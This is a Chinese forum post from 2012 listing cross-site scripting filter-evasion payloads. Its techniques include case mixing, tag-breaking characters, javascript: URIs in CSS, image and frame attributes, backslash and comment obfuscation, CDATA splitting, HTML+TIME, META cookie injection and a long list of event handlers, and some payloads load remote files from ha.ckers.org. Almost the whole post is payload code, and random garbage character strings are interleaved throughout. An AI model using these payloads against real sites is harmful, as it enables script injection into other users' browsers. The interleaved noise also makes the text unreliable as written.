1. 改变字符大小写, T# _6 [) x$ ^( i) [
6 [4 {9 W4 p; R! D+ O7 G) Z
) b0 u8 c _" j9 q( v
& Q9 k, a4 X6 E i H* n! M* | <sCript>alert(‘d’)</scRipT>
. d" D: E6 q% g( h/ [; c$ B+ U
2. 利用多加一些其它字符来规避Regular Expression的检查. g) `+ p% u) c
: I8 E8 p j( I2 p' M! C# I- E2 a
<<script>alert(‘c’)//<</script>: N" h' M7 s2 t, t! H! n
' G1 x( y8 _' c- c( J1 @
<SCRIPT a=">" SRC="t.js"></SCRIPT>" U% {; x1 s5 M. _& U8 H! q
: ]8 j ?$ ~7 I" w8 M <SCRIPT =">" SRC="t.js"></SCRIPT>* Y3 w |2 }+ \/ c8 W: P+ Q
- U Y8 j5 I9 t0 h2 r <SCRIPT a=">" ” SRC="t.js"></SCRIPT>: s+ b# y- Y1 s
- X8 ?$ D4 M7 L! n <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
9 _+ z, ~' j' ~' K! [
% I: n$ d* s( T9 k" T4 Z <SCRIPT a=`>` SRC="t.js"></SCRIPT>
* s! ?% `+ B4 R# j1 B5 A
) T3 m! V+ J' T; T( v <SCRIPT a=">’>" SRC="t.js"></SCRIPT>& f* K z2 K( K: s7 R
3 {/ K( h. r. F; R1 }! a" \1 T9 \3. 以其它扩展名取代.js+ v8 w+ V, G o; X. T
% w# t0 r) `: [; E <script src="bad.jpg"></script>
0 i9 Y" i F$ P y8 {% v+ z$ d9 R% V1 E1 V
4. 将Javascript写在CSS档里
# N1 D& G6 L2 D0 Q
T' g9 P0 G. ?9 i& ] <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">7 N( m2 [- {* h, B
* n+ L+ I. ~8 Q6 }- X3 | example:
+ z0 ^4 T% k) F; l
! I0 {( v+ \! d; I. v1 A body {0 k1 I3 f+ m- `6 ]. ~% U; R/ J, H
# U. O7 x- f9 R! f* Z$ u5 S
background-image: url(‘javascript:alert("XSS");’)
0 \- D1 F+ Y8 B9 S4 a: i- S i% {/ ^& p
}
% P8 {7 }7 A0 U1 m9 _$ K3 A/ ?3 S1 U7 u8 T
5. 在script的tag里加入一些其它字符
/ J S( ~& a. v/ C. W% k: `
1 V. Y2 ?" M0 z9 c! t6 Y& u <SCRIPT/SRC="t.js"></SCRIPT>8 s! t% f9 ^0 s; p( \/ G- r
4 i& h! R0 ]3 D! G <SCRIPT/anyword SRC="t.js"></SCRIPT>
9 d$ q8 |+ E2 G$ [& v8 s. P5 a6 h) ?; W# Y( V5 }
6. 使用tab或是new line来规避1 {) B6 Q, W, H3 O. h% c
; i( i; Q8 @/ y4 r x* f. c2 F6 B <img src="jav ascr ipt:alert(‘XSS3′)">, E- c+ a! S5 g9 }, C; U
" y& O# k+ x. D: b9 {6 _
<img src="jav ascr ipt:alert(‘XSS3′)">
* H$ g- k4 n, ^: R) F$ B0 A2 h, b3 X; A: G8 n* t/ ]' c
<IMG SRC="jav ascript:alert(‘XSS’);">9 I% p* z. [* d+ M# P
1 T; l) r0 z8 \) o; O V -> tag$ D. [; ?/ _0 b+ i7 t8 @! F: J$ ]$ d+ v
, F' h# N1 W2 }% k8 ^/ k! h) ~
-> new line4 B. ~7 t( e: I8 D% ]; ]" Z
& t3 t/ M: t7 G7. 使用"\"来规避
* o1 ]# I% ]8 u [; p3 G% v
' S" Q/ O& Z1 J% \! a4 ` u8 h <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
+ V8 D, Z& N9 V( _5 t; o6 ?* `) \' o
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>2 L& a( U5 x, E
0 g+ f3 |. W0 }0 f( q; l. W( X <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
; e8 m1 t$ p! @$ Y/ U9 C
" k2 t) j* A! _! n0 s <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 O$ ~4 E$ F5 X! v% M# b1 M0 I; s" u) @
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
) s. e8 b4 z% {+ b, G+ l2 A. X2 g0 O
- Y8 q" b4 O& T) U" d' [: r8. 使用Hex encode来规避(也可能会把";"拿掉)( J! s4 h. a" @7 I# M& }
/ x1 g2 @2 Q9 j+ z; W3 V+ C <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 T) ~0 W" x/ I; A1 ~2 ^! K. |. Z" k
6 p2 Z( }6 N& p: i& i) }/ n 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 |& Q2 q) o" @; x0 S/ W1 `9 L- G: `5 k( ?9 D
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">) ^8 d$ n2 t K7 k7 y' W- t
6 C: H3 ^8 p5 @8 j
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">- `9 @: T& `0 Q- Z
* w) h3 e5 X s
9. script in HTML tag
6 E# j+ p! J& B, x) @9 Y
/ x7 ]8 G4 f# D3 H( u <body onload=」alert(‘onload’)」>
! R* r8 N: U2 ^0 s6 L
. |6 a6 [" h5 a# M* Q onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload6 f. c& U" i: P* ^! ^# f+ G) |
' S6 l# K/ D5 k6 w( }: G4 U
10. 在swf里含有xss的code3 ~ y% Z' W7 r& J4 ]4 z
% n, ?$ x, L! b- Y <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
2 y% r# ^( F" v1 g# C- {
9 G1 ]6 Z/ Q5 S6 s5 l E11. 利用CDATA将xss的code拆开,再组合起来。
3 X+ y9 ~) z$ w' R n! T% n- [% @8 `, m0 |' z
<XML ID=I><X><C>
4 F- B+ m: R. m& j Q
( b5 C6 ]& B- J k <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>! {( B2 Y7 [5 `
5 S. [! S( d' l2 R) N </C></X>9 E( j+ C+ X! l) L0 g% E* j( [
; l9 m, S2 J4 c' G </xml>! T9 \4 \6 G- C+ ?; z ^. K6 q
5 R4 o' Q2 c/ ~# b
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>, L0 ]" M) D. Y; B! v
. y: d/ `) Y& P! m1 |$ f* Q <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML> V$ x6 `5 m& j6 Y5 J" ^- O* J
. Y: L. P7 C1 H( e4 _# b
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>+ N% ^; S, t' H6 C4 E
. p5 ^. ~5 @! A12. 利用HTML+TIME。
6 F$ C6 \! i8 _4 Q: b
9 u8 a6 R9 B5 m, F K6 m m <HTML><BODY>' R+ |5 T* t s0 I A5 c1 k
7 L6 U9 T% M' {# x4 q
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
7 [- \2 A% U5 o' q; E4 X
' ?* ?4 x. j3 \* H2 [ <?import namespace="t" implementation="#default#time2">
. c5 g- A. \* F6 @' m' n" B4 Q/ ^( g- M; {9 d$ g- F
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">2 e H H/ U: N& s
8 e# e% A# \6 |! g1 U
</BODY></HTML>
& U* p1 }6 r' U: \. \+ ~( P3 H' ^' z
7 |9 M( {' k4 o y$ ~! x5 l2 }' b; M, H13. 透过META写入Cookie。
' }; f# N% r7 }& u
- d! S8 j. C8 O% ~8 B3 f <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">4 A) `+ N: q0 Y9 p( z$ |
% d' T: ^: O' B4 f0 a14. javascript in src , href , url0 s5 }* L7 O2 E
5 I1 W- A! M4 B! p* _' Z- w) _ <IFRAME SRC=javascript:alert(’13′)></IFRAME>
^0 c; C& O/ y
% F8 i3 X; \/ E- W <img src="javascript:alert(‘XSS3′)">' [* e+ J& R: R4 A
; y: q% T, F: L @8 |<IMG DYNSRC="javascript:alert(‘XSS20′)">4 J7 I1 I# i7 L# h! E/ E( W
3 F' M5 C4 }8 [( r <IMG LOWSRC="javascript:alert(‘XSS21′)">
/ ]1 x! G! O1 _7 N3 v2 t& b4 r: J1 _6 W9 i( I8 N
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">% f" S# G8 x; d7 [4 g9 _/ [
) L w2 n. ?" p5 t1 L
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
) F& P8 S R( p! L' t' h
2 H0 p: m- j5 i% o. O <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
$ g2 k5 ]- Q: g! P. j3 Z8 r1 U% H; b8 P( @( y* Z7 ~4 i
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">0 I, F: w! ?' Z4 a; R- ~2 |" E
2 j0 [1 M; z- b% q0 `2 i. A* I <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
+ x7 L: d; N' y( ^' q# t; y* l {- o! f6 U1 n
</STYLE><A CLASS=XSS></A>; R& K# j) b, V4 q
2 t6 _1 _- P' Y2 s. Z+ y
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
' W* i* N7 q* z+ c! U+ k4 X
( I& @) ?' W! i8 H G2 X" j |
发表于 2012-12-31 09:59:28
收藏
支持
反对